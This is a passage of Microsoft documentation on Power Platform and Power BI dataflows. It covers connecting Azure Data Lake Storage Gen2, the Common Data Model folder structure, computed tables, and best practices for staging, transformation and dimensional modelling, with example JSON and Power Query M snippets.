service, which may offer varying levels of compliance, privacy, security, and data
location commitments. For more information about Azure Synapse Link for
Dataverse, go to What is Azure Synapse Link for Dataverse?.

There are some advantages to configuring dataflows to store their definitions and
datafiles in your data lake, such as:

Azure Data Lake Storage Gen2 provides an enormously scalable storage facility for
data.
Dataflow data and definition files can be leveraged by your IT department's
developers to leverage Azure data and artificial intelligence (AI) services as
demonstrated in the GitHub samples from Azure data services.
It enables developers in your organization to integrate dataflow data into internal
applications and line-of-business solutions, using developer resources for
dataflows and Azure.

Requirements
To use Azure Data Lake Storage Gen2 for dataflows, you need the following:

A Power Apps environment. Any Power Apps plan will allow you to create
dataflows with Azure Data Lake Storage Gen2 as a destination. You'll need to be
authorized in the environment as a maker.
An Azure subscription. You need an Azure subscription to use Azure Data Lake
Storage Gen2.
A resource group. Use a resource group you already have, or create a new one.
An Azure storage account. The storage account must have the Data Lake Storage
Gen2 feature enabled.
 Tip

If you don't have an Azure subscription, create a free trial account before you
begin.

Prepare your Azure Data Lake Storage Gen2 for Power Platform dataflows
Before you configure your environment with an Azure Data Lake Storage Gen2 account,
you must create and configure a storage account. Here are the requirements for Power
Platform dataflows:

1. The storage account must be created in the same Azure Active Directory tenant as
your Power Apps tenant.
2. We recommend that the storage account is created in the same region as the
Power Apps environment you plan to use it in. To determine where your Power
Apps environment is, contact your environment admin.
3. The storage account must have the Hierarchical Name Space feature enabled.
4. You must be granted an Owner role on the storage account.

The following sections walk through the steps necessary to configure your Azure Data
Lake Storage Gen2 account.

Create the storage account


Follow the steps in Create an Azure Data Lake Storage Gen2 storage account.

1. Make sure you select the same region as your environment and set your storage as
StorageV2 (general purpose v2).
2. Make sure you enable the hierarchical namespace feature.
3. We recommend that you set the replication setting to Read-access geo-redundant
storage (RA-GRS).

Connect your Azure Data Lake Storage Gen2 to Power Apps
Once you've set up your Azure Data Lake Storage Gen2 account in the Azure portal,
you're ready to connect it to a specific dataflow or a Power Apps environment.
Connecting the lake to an environment allows other makers and admins in the
environment to create dataflows that store their data in your organization's lake as well.

To connect your Azure Data Lake Storage Gen2 account with the dataflow, follow these
steps:

1. Sign in to Power Apps , and verify which environment you're in. The environment
switcher is located on the right side of the header.

2. On the left navigation pane, select the down arrow next to Data.

3. In the list that appears, select Dataflows and then on the command bar select New
dataflow.

4. Select the analytical tables you want. These tables indicate what data you want to
store in your organization's Azure Data Lake Store Gen2 account.
Select the storage account to use for dataflow
storage
If a storage account hasn't yet been associated with the environment, a Link to data
lake dialog box appears. You'll need to sign in and find the data lake you created in the
previous steps. In this example, no data lake is associated with the environment and so a
prompt occurs to add one.

1. Select storage account.

The Select Storage Account screen appears.

2. Select the Subscription ID of the storage account.


3. Select the Resource group name in which the storage account was created.

4. Enter the Storage account name.

5. Select Save.

Once these steps are successfully completed, your Azure Data Lake Storage Gen2
account is connected to Power Platform Dataflows and you can continue to create a
dataflow.

Considerations and limitations


There are a few considerations and limitations to keep in mind when working with your
dataflow storage:

Linking an Azure Data Lake Store Gen2 account for dataflow storage isn't
supported in the default environment.
Once a dataflow storage location is configured for a dataflow, it can't be changed.
Once a storage account is linked, changing the environment's name isn't supported, and dataflows linked to that storage account will fail. Changing the environment's name back re-enables those dataflows.
By default, any member of the environment can access dataflow data using the
Power Platform Dataflows Connector. However, only the owners of a dataflow can
access its files directly in Azure Data Lake Storage Gen2. To authorize more people
to access the dataflows data directly in the lake, you must authorize them to the
dataflow's CDM Folder in the data lake or the data lake itself.
When a dataflow is deleted, its CDM Folder in the lake will also be deleted.
Attempting to connect two dataflow entities between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.

) Important

You shouldn't change files created by dataflows in your organization's lake or add
files to a dataflow's CDM Folder. Changing files might damage dataflows or alter
their behavior and is not supported. Power Platform Dataflows only grants read
access to files it creates in the lake. If you authorize other people or services to the
filesystem used by Power Platform Dataflows, only grant them read access to files
or folders in that filesystem.
Privacy notice
By enabling the creation of dataflows with Analytical tables in your organization, via the
Azure Synapse Link for Dataverse service, details about the Azure Data Lake storage
account, such as the name of the storage account, will be sent to and stored in the
Azure Synapse Link for Dataverse service, which is currently located outside the
PowerApps compliance boundary and may employ lesser or different privacy and
security measures than those typically in PowerApps. Note that you may remove the
data lake association at any time to discontinue use of this functionality and your Azure
Data Lake storage account details will be removed from the Azure Synapse Link for
Dataverse service. Further information about Azure Synapse Link for Dataverse is
available in this article.

Frequently asked questions


What if I had previously created dataflows in my organization's Azure Data Lake Storage
Gen2 and would like to change their storage location?

You can't change the storage location of a dataflow after it was created.

When can I change the dataflow storage location of an environment?

Changing the environment's dataflow storage location isn't currently supported.

Next steps
This article provided guidance about how to connect an Azure Data Lake Storage Gen2
account for dataflow storage.

For more information about dataflows, the Common Data Model, and Azure Data Lake
Storage Gen2, go to these articles:

Self-service data prep with dataflows


Creating and using dataflows in Power Apps
Add data to a table in Microsoft Dataverse

For more information about Azure storage, go to this article:

Azure Storage security guide

For more information about the Common Data Model, go to these articles:

Common Data Model - overview


Common Data Model folders
CDM model file definition

You can ask questions in the Power Apps Community .


What is the storage structure for
analytical dataflows?
Article • 08/04/2023

Analytical dataflows store both data and metadata in Azure Data Lake Storage.
Dataflows leverage a standard structure to store and describe data created in the lake,
which is called Common Data Model folders. In this article, you'll learn more about the
storage standard that dataflows use behind the scenes.

Storage needs a structure for an analytical dataflow
If the dataflow is standard, then the data is stored in Dataverse. Dataverse is like a
database system; it has the concept of tables, views, and so on. Dataverse is a structured
data storage option used by standard dataflows.

However, when the dataflow is analytical, the data is stored in Azure Data Lake Storage.
A dataflow’s data and metadata is stored in a Common Data Model folder. Since a
storage account might have multiple dataflows stored in it, a hierarchy of folders and
subfolders has been introduced to help organize the data. Depending on the product
the dataflow was created in, the folders and subfolders may represent workspaces (or
environments), and then the dataflow’s Common Data Model folder. Inside the
Common Data Model folder, both schema and data of the dataflow tables are stored.
This structure follows the standards defined for Common Data Model.
What is the Common Data Model storage
structure?
Common Data Model is a metadata structure defined to bring conformity and
consistency for using data across multiple platforms. Common Data Model isn't data
storage; it's the way that data is stored and defined.

Common Data Model folders define how a table's schema and its data should be stored.
In Azure Data Lake Storage, data is organized in folders. Folders can represent a
workspace or environment. Under those folders, subfolders for each dataflow are
created.

What's in a dataflow folder?


Each dataflow folder contains a subfolder for each table and a metadata file named
model.json .

The metadata file: model.json


The model.json file is the metadata definition of the dataflow. This is the one file that
contains all the dataflow metadata. It includes a list of tables, the columns, and their
data types in each table, the relationship between tables, and so on. You can export this
file from a dataflow easily, even if you don't have access to the Common Data Model
folder structure.

You can use this JSON file to migrate (or import) your dataflow into another workspace
or environment.
To learn exactly what the model.json metadata file includes, go to The metadata file
(model.json) for Common Data Model.
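
As a rough illustration of the structure (a simplified sketch, not the full schema), a model.json file for a dataflow with a single Account table might look like this; the names and location URL are placeholders:

```json
{
  "name": "SalesDataflow",
  "version": "1.0",
  "entities": [
    {
      "$type": "LocalEntity",
      "name": "Account",
      "attributes": [
        { "name": "AccountId", "dataType": "string" },
        { "name": "AccountName", "dataType": "string" }
      ],
      "partitions": [
        {
          "name": "Part001",
          "location": "https://<storage-account>.dfs.core.windows.net/<workspace>/<dataflow>/Account/Part001.csv"
        }
      ]
    }
  ]
}
```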

Data files
In addition to the metadata file, the dataflow folder includes other subfolders. A
dataflow stores the data for each table in a subfolder with the table's name. Data for a
table might be split into multiple data partitions, stored in CSV format.

How to see or access Common Data Model


folders
If you're using dataflows that use storage provided by the product they were created in,
you won't have access to those folders directly. In such cases, getting data from the
dataflows requires using the Microsoft Power Platform dataflow connector available in
the Get data experience in the Power BI service, Power Apps, and Dynamics 365 Customer Insights products, or in Power BI Desktop.
To learn how dataflows and the internal Data Lake Storage integration work, go to
Dataflows and Azure Data Lake integration (Preview).

If your organization enabled dataflows to take advantage of its Data Lake Storage
account and was selected as a load target for dataflows, you can still get data from the
dataflow by using the Power Platform dataflow connector as mentioned above. But you
can also access the dataflow's Common Data Model folder directly through the lake,
even outside of Power Platform tools and services. Access to the lake is possible through
the Azure portal, Microsoft Azure Storage Explorer, or any other service or experience
that supports Azure Data Lake Storage. More information: Connect Azure Data Lake
Storage Gen2 for dataflow storage
Next steps
Use the Common Data Model to optimize Azure Data Lake Storage Gen2

The metadata file (model.json) for the Common Data Model

Add a CDM folder to Power BI as a dataflow (Preview)

Connect Azure Data Lake Storage Gen2 for dataflow storage

Dataflows and Azure Data Lake Integration (Preview)

Configure workspace dataflow settings (Preview)


Dataflow storage options
Article • 09/01/2022

Standard dataflows always load data into Dataverse tables in an environment. Analytical
dataflows always load data into Azure Data Lake Storage accounts. For both dataflow
types, there's no need to provision or manage the storage. Dataflow storage, by default,
is provided and managed by products the dataflow is created in.

Analytical dataflows allow an additional storage option: your organizations' Azure Data
Lake Storage account. This option enables access to the data created by a dataflow
directly through Azure Data Lake Storage interfaces. Providing your own storage
account for analytical dataflows enables other Azure or line-of-business applications to
leverage the data by connecting to the lake directly.

Dataflows that use built-in storage


By default, analytical dataflows will use the built-in Data Lake Storage; for example,
when you create a dataflow in Power BI or Power Apps. Access to the output of this type
of dataflow is only possible through the Microsoft Power Platform dataflows connector
in Power BI Desktop, or from other dataflows.

Dataflows that use customer-provided storage


Before creating a dataflow that uses your organization's Data Lake Storage account, you
must link the environment or workspace the dataflow was created in to your Data Lake
Storage account. Depending on which product dataflow you're using (Power BI or Power
Platform dataflows), the settings for connecting to an external Data Lake Storage
subscription are located in different places.

Linking Power BI to your organization's Azure Data Lake Storage
To configure Power BI dataflows to store data in your organization's Data Lake Storage,
you need to follow the steps described in Connect Azure Data Lake Storage Gen2 for
dataflow storage in the Power BI admin portal.
Linking a Power Platform environment to your
organization's Azure Data Lake Storage
To configure dataflows created in Power Apps to store data in your organization's Azure
Data Lake Storage, follow the steps in Connect Azure Data Lake Storage Gen2 for
dataflow storage in Power Apps.

Known limitations
After a dataflow is created, its storage location can't be changed.
Linked and computed entities features are only available when both dataflows are
in the same storage account.

The enhanced compute engine


In Power BI, in addition to the standard dataflow engine, an enhanced compute engine
is available for the dataflows created in Power BI Premium workspaces. You can
configure this setting in the Power BI admin portal, under the Premium capacity settings.
The enhanced compute engine is available in Premium P1 or A3 capacities and above.
The enhanced compute engine reduces the refresh time required for long-running
extract, transform, load (ETL) steps over computed entities, such as joins, distinct, filters,
and group by. It also provides the ability to perform DirectQuery over entities from the
Power BI dataset. More information: The enhanced compute engine

Next steps
The articles below provide further information that can be helpful.

Connect Azure Data Lake Storage Gen2 for dataflow storage (Power BI dataflows)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power Platform
dataflows)
Creating computed entities in dataflows
The enhanced compute engine
Understanding the differences between standard and analytical dataflows
Computed table scenarios and use cases
Article • 08/04/2023

There are benefits to using computed tables in a dataflow. This article describes use
cases for computed tables and describes how they work behind the scenes.

What is a computed table?


A table represents the data output of a query created in a dataflow, after the dataflow
has been refreshed. It represents data from a source and, optionally, the transformations
that were applied to it. Sometimes, you might want to create new tables that are a
function of a previously ingested table.

Although it's possible to repeat the queries that created a table and apply new
transformations to them, this approach has drawbacks: data is ingested twice, and the
load on the data source is doubled.

Computed tables solve both problems. Computed tables are similar to other tables in
that they get data from a source and you can apply further transformations to create
them. But their data originates from the storage used by the dataflow, and not the original data
source. That is, they were previously created by a dataflow and then reused.

Computed tables can be created by referencing a table in the same dataflow or by referencing a table created in a different dataflow.

Why use a computed table?


Performing all transformation steps in one table can be slow. There can be many
reasons for this slowdown—the data source might be slow, or the transformations that
you're doing might need to be replicated in two or more queries. It might be
advantageous to first ingest the data from the source and then reuse it in one or more
tables. In such cases, you might choose to create two tables: one that gets data from the
data source, and another—a computed table—that applies more transformations to
data already written into the data lake used by a dataflow. This change can increase
performance and reusability of data, saving time and resources.

For example, if two tables share even a part of their transformation logic, without a
computed table, the transformation has to be done twice.
However, if a computed table is used, then the common (shared) part of the
transformation is processed once and stored in Azure Data Lake Storage. The remaining
transformations are then processed from the output of the common transformation.
Overall, this processing is much faster.

A computed table provides one place as the source code for the transformation and
speeds up the transformation because it only needs to be done once instead of multiple
times. The load on the data source is also reduced.

Example scenario for using a computed table


If you're building an aggregated table in Power BI to speed up the data model, you can
build the aggregated table by referencing the original table and applying more
transformations to it. By using this approach, you don't need to replicate your
transformation from the source (the part that is from the original table).

For example, the following figure shows an Orders table.

Using a reference from this table, you can build a computed table.

The computed table can have further transformations. For example, you can use Group
By to aggregate the data at the customer level.
This means that the Orders Aggregated table is getting data from the Orders table, and
not from the data source again. Because some of the transformations that need to be
done have already been done in the Orders table, performance is better and data
transformation is faster.
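In M terms, the Orders Aggregated query simply references the Orders query and applies the aggregation on top of it. The sketch below assumes hypothetical column names such as CustomerKey and SalesAmount; your own Orders table will differ.

```powerquery-m
let
    // Reference the Orders table that's already loaded by this dataflow
    Source = Orders,
    // Aggregate at the customer level; the column names are illustrative
    Aggregated = Table.Group(
        Source,
        {"CustomerKey"},
        {
            {"TotalSales", each List.Sum([SalesAmount]), type nullable number},
            {"OrderCount", each Table.RowCount(_), Int64.Type}
        }
    )
in
    Aggregated
```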

Computed table in other dataflows


You can also create a computed table in other dataflows. It can be created by getting
data from a dataflow with the Microsoft Power Platform dataflow connector.
The concept of the computed table is to have a table persisted in storage, and other
tables sourced from it, so that you can reduce the read time from the data source and
share some of the common transformations. This reduction can be achieved by getting
data from other dataflows through the dataflow connector or referencing another query
in the same dataflow.

Computed table: With transformations, or without?
Now that you know computed tables are great for improving performance of the data
transformation, a good question to ask is whether transformations should always be
deferred to the computed table or whether they should be applied to the source table.
That is, should data always be ingested into one table and then transformed in a
computed table? What are the pros and cons?

Load data without transformation for Text/CSV files


When a data source doesn't support query folding (such as Text/CSV files), there's little
benefit in applying transformations when getting data from the source, especially if data
volumes are large. The source table should just load data from the Text/CSV file without
applying any transformations. Then, computed tables can get data from the source table
and perform the transformation on top of the ingested data.
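For example, a Text/CSV setup might look like the following two queries. The file path, query names, and column names are placeholders: the first query only ingests the file, and the second is the computed table that references it and applies the transformations.

```powerquery-m
// Staging query (for example, named "RawSales"): load the file as-is, no transformations
let
    Source = Csv.Document(File.Contents("C:\Data\Sales.csv"), [Delimiter = ",", Encoding = 65001]),
    PromotedHeaders = Table.PromoteHeaders(Source, [PromoteAllScalars = true])
in
    PromotedHeaders

// Computed table: reference the staging query and transform the already-ingested data
let
    Source = RawSales,
    ChangedTypes = Table.TransformColumnTypes(Source, {{"OrderDate", type date}, {"SalesAmount", type number}}),
    FilteredRows = Table.SelectRows(ChangedTypes, each [SalesAmount] > 0)
in
    FilteredRows
```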

You might ask, what's the value of creating a source table that only ingests data? Such a
table can still be useful, because if the data from the source is used in more than one
table, it reduces the load on the data source. In addition, data can now be reused by
other people and dataflows. Computed tables are especially useful in scenarios where
the data volume is large, or when a data source is accessed through an on-premises
data gateway, because they reduce the traffic from the gateway and the load on data
sources behind them.

Doing some of the common transformations for a SQL table
If your data source supports query folding, it's good to perform some of the
transformations in the source table because the query is folded to the data source, and
only the transformed data is fetched from it. These changes improve overall
performance. The set of transformations that is common in downstream computed
tables should be applied in the source table, so they can be folded to the source. Other
transformations that only apply to downstream tables should be done in computed
tables.
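A minimal sketch of such a source table over SQL Server, assuming hypothetical server, database, and column names. The row filter and column selection below fold back to the source, so only the reduced result is fetched; downstream computed tables then take their data from this table.

```powerquery-m
let
    Source = Sql.Database("sql-server-name", "SalesDb"),
    Orders = Source{[Schema = "dbo", Item = "Orders"]}[Data],
    // These steps fold to the source, assuming OrderDate is a date column
    RecentOrders = Table.SelectRows(Orders, each [OrderDate] >= #date(2023, 1, 1)),
    SelectedColumns = Table.SelectColumns(RecentOrders, {"OrderID", "CustomerID", "OrderDate", "SalesAmount"})
in
    SelectedColumns
```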
Best practices for designing and
developing complex dataflows
Article • 08/04/2023

If the dataflow you're developing is getting bigger and more complex, here are some
things you can do to improve on your original design.

Break it into multiple dataflows


Don't do everything in one dataflow. Not only does a single, complex dataflow make the
data transformation process longer, it also makes it harder to understand and reuse the
dataflow. Breaking your dataflow into multiple dataflows can be done by separating
tables in different dataflows, or even one table into multiple dataflows. You can use the
concept of a computed table or linked table to build part of the transformation in one
dataflow, and reuse it in other dataflows.

Split data transformation dataflows from staging/extraction dataflows
Having some dataflows just for extracting data (that is, staging dataflows) and others
just for transforming data is helpful not only for creating a multilayered architecture, but also for reducing the complexity of dataflows. Some steps just extract data from
the data source, such as get data, navigation, and data type changes. By separating the
staging dataflows and transformation dataflows, you make your dataflows simpler to
develop.
Use custom functions
Custom functions are helpful in scenarios where a certain number of steps have to be
done for a number of queries from different sources. Custom functions can be
developed through the graphical interface in Power Query Editor or by using an M
script. Functions can be reused in a dataflow in as many tables as needed.

A custom function gives you a single version of the source code, so you don't have to duplicate logic across queries. As a result, maintaining the Power Query
transformation logic and the whole dataflow is much easier. For more information, go to
the following blog post: Custom Functions Made Easy in Power BI Desktop .
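As a simple illustration, the following M sketch defines a reusable function (saved as its own query, here hypothetically named RemoveBlankRows) and shows how any table query can call it. The function body is only an example of the kind of shared step you might centralize.

```powerquery-m
// Query "RemoveBlankRows", created as a function
(inputTable as table) as table =>
let
    // Keep only rows that contain at least one non-empty value
    NonBlankRows = Table.SelectRows(
        inputTable,
        each not List.IsEmpty(List.RemoveMatchingItems(Record.FieldValues(_), {"", null}))
    )
in
    NonBlankRows

// Any other query in the dataflow can then reuse it, for example:
// CleanedCustomers = RemoveBlankRows(Customers)
```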

7 Note

Sometimes you might receive a notification that tells you a premium capacity is
required to refresh a dataflow with a custom function. You can ignore this message
and reopen the dataflow editor. This usually solves your problem unless your
function refers to a "load enabled" query.

Place queries into folders


Using folders for queries helps to group related queries together. When developing the
dataflow, spend a little more time to arrange queries in folders that make sense. Using
this approach, you can find queries more easily in the future and maintaining the code is
much easier.

Use computed tables


Computed tables not only make your dataflow more understandable, they also provide
better performance. When you use a computed table, the other tables referenced from
it are getting data from an "already-processed-and-stored" table. The transformation is
much simpler and faster.

Take advantage of the enhanced compute engine
For dataflows developed in Power BI Premium workspaces, ensure that you make use of the
enhanced compute engine by performing joins and filter transformations first in a
computed table before doing other types of transformations.

Break many steps into multiple queries


It's hard to keep track of a large number of steps in one table. Instead, you should break
a large number of steps into multiple tables. You can turn off Enable load for intermediate
queries, and only load the final table through the dataflow. When you have multiple
queries with smaller steps in each, it's easier to
use the dependency diagram and track each query for further investigation, rather than
digging into hundreds of steps in one query.

Add properties for queries and steps


Documentation is the key to having easy-to-maintain code. In Power Query, you can
add properties to the tables and also to steps. The text that you add in the properties
shows up as a tooltip when you hover over that query or step. This documentation helps
you maintain your model in the future. With a glance at a table or step, you can
understand what's happening there, rather than rethinking and remembering what
you've done in that step.

Ensure that capacity is in the same region


Dataflows don't currently support multiple countries or regions. The Premium capacity
must be in the same region as your Power BI tenant.

Separate on-premises sources from cloud sources
We recommend that you create a separate dataflow for each type of source, such as on-
premises, cloud, SQL Server, Spark, and Dynamics 365. Separating dataflows by source
type facilitates quick troubleshooting and avoids internal limits when you refresh your
dataflows.

Separate dataflows based on the scheduled refresh required for tables
If you have a sales transaction table that gets updated in the source system every hour
and you have a product-mapping table that gets updated every week, break these two
tables into two dataflows with different data refresh schedules.

Avoid scheduling refresh for linked tables in the same workspace
If you're regularly being locked out of your dataflows that contain linked tables, it might
be caused by a corresponding, dependent dataflow in the same workspace that's locked
during dataflow refresh. Such locking provides transactional accuracy and ensures that
both dataflows are successfully refreshed, but it can block you from editing.

If you set up a separate schedule for the linked dataflow, dataflows can be refreshed
unnecessarily and block you from editing the dataflow. There are two recommendations
to avoid this problem:

Don't set a refresh schedule for a linked dataflow in the same workspace as the
source dataflow.
If you want to configure a refresh schedule separately and want to avoid the
locking behavior, move the dataflow to a separate workspace.
Best practices for reusing dataflows
across environments and workspaces
Article • 08/04/2023

This article discusses a collection of best practices for reusing dataflows effectively and
efficiently. Read this article to avoid design pitfalls and potential performance issues as
you develop dataflows for reuse.

Separate data transformation dataflows from staging/extraction dataflows
If a dataflow performs all the actions, it's hard to reuse its tables in other dataflows or
for other purposes. The best dataflows to reuse are those dataflows that do only a few
actions. Creating dataflows that specialize in one specific task is one of the best ways to
reuse them. If you have a set of dataflows that you use as staging dataflows, their only
action is to extract data as-is from the source system. These dataflows can be reused in
multiple other dataflows.

If you have data transformation dataflows, you can split them into dataflows that do
common transformations. Each dataflow can do just a few actions. These few actions per
dataflow ensure that the output of that dataflow is reusable by other dataflows.

Use multiple workspaces


Each workspace (or environment) is available only for members of that workspace. If you
build all your dataflows in one workspace, you're minimizing the reuse of your
dataflows. You can have some generic workspaces for dataflows that process company-wide
tables, some workspaces for dataflows that process tables shared across multiple
departments, and some workspaces for dataflows that are used only in specific departments.

Set the correct access levels on workspaces


To allow dataflows in other workspaces to use the output of a dataflow in a workspace,
you just need to give their users View access in that workspace. To learn more
about other roles in a Power BI workspace, go to Roles in the new workspaces.
Endorsement on the dataflow in Power BI
There can be many dataflows created in a tenant organization, and it can be hard for the
users to know which dataflow is most reliable. Authors of a dataflow, or those users who
have edit access to it, can endorse the dataflow at three levels: no endorsement,
promoted, or certified.

These levels of endorsement help users find reliable dataflows more easily and quickly. The
dataflow with a higher endorsement level appears first. The Power BI administrator can
delegate the ability to endorse dataflows to the certified level to other people. More
information: Endorsement - Promoting and certifying Power BI content
Separate tables in multiple dataflows
You can have multiple tables in one dataflow. One of the reasons you might split tables
in multiple dataflows is what you learned earlier in this article about separating the data
ingestion and data transformation dataflows. Another good reason to have tables in
multiple dataflows is when you want a different refresh schedule than other tables.

In the example shown in the following image, the sales table needs to be refreshed
every four hours. The date table needs to be refreshed only once a day to keep the
current date record updated. And a product-mapping table just needs to be refreshed
once a week. If you have all of these tables in one dataflow, you have only one refresh
option for them all. However, if you split these tables into multiple dataflows, you can
schedule the refresh of each dataflow separately.
Good table candidates for dataflow tables
When you develop solutions using Power Query in the desktop tools, you might ask
yourself; which of these tables are good candidates to be moved to a dataflow? The best
tables to be moved to the dataflow are those tables that need to be used in more than
one solution, or more than one environment or service. For example, the Date table
shown in the following image needs to be used in two separate Power BI files. Instead of
duplicating that table in each file, you can build the table in a dataflow as a table, and
reuse it in those Power BI files.
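A date table like the one described is a good example of a query worth building once in a dataflow and reusing. A minimal sketch in M follows; the date range and added columns are just examples.

```powerquery-m
let
    StartDate = #date(2020, 1, 1),
    EndDate = #date(2025, 12, 31),
    DayCount = Duration.Days(EndDate - StartDate) + 1,
    // Generate one row per day and add a few common attributes
    Dates = List.Dates(StartDate, DayCount, #duration(1, 0, 0, 0)),
    DateTable = Table.FromList(Dates, Splitter.SplitByNothing(), {"Date"}),
    TypedDates = Table.TransformColumnTypes(DateTable, {{"Date", type date}}),
    AddedYear = Table.AddColumn(TypedDates, "Year", each Date.Year([Date]), Int64.Type),
    AddedMonth = Table.AddColumn(AddedYear, "Month", each Date.Month([Date]), Int64.Type)
in
    AddedMonth
```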
Best practices for creating a dimensional
model using dataflows
Article • 08/04/2023

Designing a dimensional model is one of the most common tasks you can do with a
dataflow. This article highlights some of the best practices for creating a dimensional
model using a dataflow.

Staging dataflows
One of the key points in any data integration system is to reduce the number of reads
from the source operational system. In the traditional data integration architecture, this
reduction is done by creating a new database called a staging database. The purpose of
the staging database is to load data as-is from the data source into the staging
database on a regular schedule.

The rest of the data integration will then use the staging database as the source for
further transformation and converting it to the dimensional model structure.

We recommend that you follow the same approach using dataflows. Create a set of
dataflows that are responsible for just loading data as-is from the source system (and
only for the tables you need). The result is then stored in the storage structure of the
dataflow (either Azure Data Lake Storage or Dataverse). This change ensures that the
read operation from the source system is minimal.

Next, you can create other dataflows that source their data from staging dataflows. The
benefits of this approach include:

Reducing the number of read operations from the source system, and reducing the
load on the source system as a result.
Reducing the load on data gateways if an on-premises data source is used.
Having an intermediate copy of the data for reconciliation purpose, in case the
source system data changes.
Making the transformation dataflows source-independent.
Transformation dataflows
When you've separated your transformation dataflows from the staging dataflows, the
transformation will be independent from the source. This separation helps if you're
migrating the source system to a new system. All you need to do in that case is to
change the staging dataflows. The transformation dataflows are likely to work without
any problem, because they're sourced only from the staging dataflows.

This separation also helps in case the source system connection is slow. The
transformation dataflow won't need to wait for a long time to get records coming
through a slow connection from the source system. The staging dataflow has already
done that part, and the data will be ready for the transformation layer.
Layered Architecture
A layered architecture is an architecture in which you perform actions in separate layers.
The staging and transformation dataflows can be two layers of a multi-layered dataflow
architecture. Keeping actions in separate layers keeps the required maintenance to a minimum.
When you want to change something, you just need to change it in the layer in which
it's located. The other layers should all continue to work fine.

The following image shows a multi-layered architecture for dataflows in which their
tables are then used in Power BI datasets.
Use a computed table as much as possible
When you use the result of a dataflow in another dataflow, you're using the concept of
the computed table, which means getting data from an "already-processed-and-stored"
table. The same thing can happen inside a dataflow. When you reference a table from
another table, you can use the computed table. This is helpful when you have a set of
transformations that need to be done in multiple tables, which are called common
transformations.

In the previous image, the computed table gets the data directly from the source.
However, in the architecture of staging and transformation dataflows, it's likely that the
computed tables are sourced from the staging dataflows.
Build a star schema
The best dimensional model is a star schema model that has dimensions and fact tables
designed in a way to minimize the amount of time to query the data from the model,
and also makes it easy to understand for the data visualizer.

It isn't ideal to bring data into a BI system in the same layout as the operational system.
The data tables should be remodeled. Some of the tables should take the form of a
dimension table, which keeps the descriptive information. Some of the tables should
take the form of a fact table, to keep the aggregatable data. The best layout for fact
tables and dimension tables to form is a star schema. More information: Understand star
schema and the importance for Power BI
Use a unique key value for dimensions
When building dimension tables, make sure you have a key for each one. This key
ensures that there are no many-to-many (or in other words, "weak") relationships
among dimensions. You can create the key by applying some transformation to make
sure a column or a combination of columns is returning unique rows in the dimension.
Then that combination of columns can be marked as a key in the table in the dataflow.
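A hedged sketch of that transformation in M, assuming a staging query named StagedCustomers and a RegionCode column that should uniquely identify each region. Marking the key can also be done through the dataflow editor; Table.AddKey is simply the underlying M expression.

```powerquery-m
let
    Source = StagedCustomers,
    // Keep only the columns that describe a region
    RegionColumns = Table.SelectColumns(Source, {"RegionCode", "RegionName"}),
    // Remove duplicates so that RegionCode returns unique rows
    DistinctRegions = Table.Distinct(RegionColumns, {"RegionCode"}),
    // Mark RegionCode as the key of the dimension table
    KeyedRegions = Table.AddKey(DistinctRegions, {"RegionCode"}, true)
in
    KeyedRegions
```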
Do an incremental refresh for large fact tables
Fact tables are always the largest tables in the dimensional model. We recommend that
you reduce the number of rows transferred for these tables. If you have a very large fact
table, ensure that you use incremental refresh for that table. An incremental refresh can
be done in the Power BI dataset, and also the dataflow tables.

You can use incremental refresh to refresh only part of the data, the part that has
changed. There are multiple options to choose which part of the data to be refreshed
and which part to be persisted. More information: Using incremental refresh with Power
BI dataflows
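When incremental refresh is configured for a dataflow table, it relies on a date or datetime filter over the source, conceptually similar to the sketch below. RangeStart and RangeEnd stand in for the refresh window boundaries, and the server, table, and column names are placeholders; in dataflows the policy is normally configured through the table's incremental refresh settings rather than written by hand, so treat this only as an illustration.

```powerquery-m
let
    Source = Sql.Database("sql-server-name", "SalesDb"),
    FactSales = Source{[Schema = "dbo", Item = "FactSales"]}[Data],
    // Only rows inside the current refresh window are retrieved
    FilteredRows = Table.SelectRows(
        FactSales,
        each [OrderDateTime] >= RangeStart and [OrderDateTime] < RangeEnd
    )
in
    FilteredRows
```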

Referencing to create dimensions and fact tables
In the source system, you often have a table that you use for generating both fact and
dimension tables in the data warehouse. These tables are good candidates for
computed tables and also intermediate dataflows. The common part of the process—
such as data cleaning, and removing extra rows and columns—can be done once. By
using a reference from the output of those actions, you can produce the dimension and
fact tables. This approach will use the computed table for the common transformations.
Improve performance and reusability by
separating data ingestion from data
transformation dataflows
Article • 02/17/2023

One of the best practices for dataflow implementations is separating the responsibilities
of dataflows into two layers: data ingestion and data transformation. This pattern is
specifically helpful when dealing with multiple queries of slower data sources in one
dataflow, or multiple dataflows querying the same data sources. Instead of getting data
from a slow data source again and again for each query, the data ingestion process can
be done once, and the transformation can be done on top of that process. This article
explains the process.

On-premises data source


In many scenarios, the on-premises data source is a slow data source, especially because
the gateway acts as the middle layer between the dataflow and the data source.
Using analytical dataflows for data ingestion minimizes the get data process from the
source and focuses on loading data to Azure Data Lake Storage. Once in storage, other
dataflows can be created that leverage the ingestion dataflow's output. The dataflow
engine can read the data and do the transformations directly from the data lake,
without contacting the original data source or gateway.
Slow data source
The same process is valid when a data source is slow. Some of the software as a service
(SaaS) data sources perform slowly because of the limitations of their API calls.

Separation of the data ingestion and data transformation dataflows
The separation of the two layers—data ingestion and transformation—is helpful in the
scenarios where the data source is slow. It helps to minimize the interaction with the
data source.

This separation isn't only useful because of the performance improvement, it's also
helpful for the scenarios where an old legacy data source system has been migrated to a
new system. In those cases, only the data ingestion dataflows need to be changed. The
data transformation dataflows remain intact for this type of change.
Reuse in other tools and services
Separation of data ingestion dataflows from data transformation dataflows is helpful in
many scenarios. Another use case scenario for this pattern is when you want to use this
data in other tools and services. For this purpose, it's better to use analytical dataflows
and use your own Data Lake Storage as the storage engine. More information: Analytical
dataflows

Optimize the data ingestion dataflow


Consider optimizing the data ingestion dataflow whenever possible. As an example, if all
the data from the source isn't needed, and the data source supports query folding, then
filtering data and getting only a required subset is a good approach. To learn more
about query folding, go to Power Query query folding.
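For example, if only current-year rows for one region are needed downstream, a filter like the following (hypothetical table and column names) folds to the source, so the ingestion dataflow pulls only the required subset.

```powerquery-m
let
    Source = Sql.Database("sql-server-name", "SalesDb"),
    Transactions = Source{[Schema = "dbo", Item = "Transactions"]}[Data],
    // Folds to a WHERE clause at the source, reducing what the dataflow ingests
    RequiredSubset = Table.SelectRows(
        Transactions,
        each [Region] = "Europe" and [TransactionDate] >= #date(2023, 1, 1)
    )
in
    RequiredSubset
```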
Create the data ingestion dataflows as
analytical dataflows
Consider creating your data ingestion dataflows as analytical dataflows. This especially
